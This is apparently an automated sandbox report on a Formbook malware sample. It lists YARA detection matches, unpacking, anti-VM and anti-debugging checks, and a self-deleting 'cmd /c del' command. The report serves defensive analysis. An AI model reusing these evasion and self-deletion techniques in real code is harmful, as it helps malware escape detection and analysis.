          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383EBB07_2_0383EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CDBD27_2_038CDBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D2B287_2_038D2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D22AE7_2_038D22AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380F9007_2_0380F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038241207_2_03824120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381B0907_2_0381B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A07_2_038320A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D20A87_2_038D20A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D28EC7_2_038D28EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C10027_2_038C1002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038DE8247_2_038DE824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D1FF17_2_038D1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D2EF77_2_038D2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CD6167_2_038CD616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03826E307_2_03826E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038325817_2_03832581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D25DD7_2_038D25DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381D5E07_2_0381D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D2D077_2_038D2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03800D207_2_03800D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D1D557_2_038D1D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381841F7_2_0381841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CD4667_2_038CD466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104C5387_2_0104C538
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01032D897_2_01032D89
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01032D907_2_01032D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01038C5B7_2_01038C5B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01038C607_2_01038C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104C7A07_2_0104C7A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01032FB07_2_01032FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0380B150 appears 35 times
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: String function: 00A1B150 appears 35 times
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: String function: 0041A0A0 appears 38 times
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 1cec9342_by_Libranalysis.exe, 00000000.00000003.645430584.000000001EEAF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1cec9342_by_Libranalysis.exe
          Source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693898854.0000000000C9F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1cec9342_by_Libranalysis.exe
          Source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693999734.0000000000D72000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs 1cec9342_by_Libranalysis.exe
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@14/9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_01
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Temp\nsz26A1.tmpJump to behavior
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 1cec9342_by_Libranalysis.exeVirustotal: Detection: 54%
          Source: 1cec9342_by_Libranalysis.exeMetadefender: Detection: 20%
          Source: 1cec9342_by_Libranalysis.exeReversingLabs: Detection: 82%
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile read: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'Jump to behavior
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 1cec9342_by_Libranalysis.exe, 00000000.00000003.645751865.000000001EC00000.00000004.00000001.sdmp, 1cec9342_by_Libranalysis.exe, 00000001.00000002.693732282.0000000000B0F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 1cec9342_by_Libranalysis.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeUnpacked PE file: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0040102D pushfd ; ret 1_2_0040102E
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004160CD push 00000033h; iretd 1_2_004160F6
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004161E9 push es; retf 1_2_00416257
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041624E push es; retf 1_2_00416257
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00418F45 push es; ret 1_2_00418F4B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041CFEE push dword ptr [C5AA8973h]; retn EADCh1_2_0041D044
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A6D0D1 push ecx; ret 1_2_00A6D0E4
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_0040102D pushfd ; ret 1_1_0040102E
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004160CD push 00000033h; iretd 1_1_004160F6
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004161E9 push es; retf 1_1_00416257
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_0041624E push es; retf 1_1_00416257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0385D0D1 push ecx; ret 7_2_0385D0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010461E9 push es; retf 7_2_01046257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010460CD push 00000033h; iretd 7_2_010460F6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104C381 pushad ; retf 7_2_0104C382
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104B3B5 push eax; ret 7_2_0104B408
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104624E push es; retf 7_2_01046257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104B402 push eax; ret 7_2_0104B408
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104B40B push eax; ret 7_2_0104B472
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104B46C push eax; ret 7_2_0104B472
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01048F45 push es; ret 7_2_01048F4B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dllJump to dropped file
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000010385E4 second address: 00000000010385EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 000000000103897E second address: 0000000001038984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Windows\explorer.exe TID: 7036Thread sleep time: -55000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5012Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.673150104.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.669248247.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.673150104.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.665465411.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.673301906.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.673364825.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00409B20 LdrLoadDll,1_2_00409B20
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_6FD710A0 mov eax, dword ptr fs:[00000030h]0_2_6FD710A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]1_2_00A420A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]1_2_00A420A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]1_2_00A420A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]1_2_00A420A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]1_2_00A420A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A420A0 mov eax, dword ptr fs:[00000030h]1_2_00A420A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A590AF mov eax, dword ptr fs:[00000030h]1_2_00A590AF
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4F0BF mov ecx, dword ptr fs:[00000030h]1_2_00A4F0BF
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4F0BF mov eax, dword ptr fs:[00000030h]1_2_00A4F0BF
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4F0BF mov eax, dword ptr fs:[00000030h]1_2_00A4F0BF
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A19080 mov eax, dword ptr fs:[00000030h]1_2_00A19080
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A93884 mov eax, dword ptr fs:[00000030h]1_2_00A93884
